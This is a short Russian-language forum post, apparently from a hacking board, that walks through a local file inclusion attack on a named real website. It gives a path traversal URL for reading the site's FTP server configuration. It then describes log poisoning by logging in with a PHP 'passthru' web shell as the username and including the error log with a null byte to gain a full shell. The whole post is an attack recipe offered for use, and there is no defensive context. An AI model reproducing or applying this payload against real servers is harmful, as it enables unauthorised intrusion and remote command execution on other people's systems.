Ядовитый 0 работает.. то есть, что можем из этого извлечь. МЫ находим любые логи (возбмем к примеру логи фтп-шника или сервера (для поисков логов фтпшника нам в помощь приходи http://biznesprom.ru/index.php?aux_page=../../../../../../../../../../../../../etc/proftpd.conf ) .. затем.. если фтп - то .. пытаемся залогиниться на сервер с логином.. ну например <? @passthru($cmd); ?> ... что естественно отображается в логах (неправтльный лог.. значит в еррор-логе) . Инклудим лог, ставим %00 , и у нас есть полноценный шелл.

__________________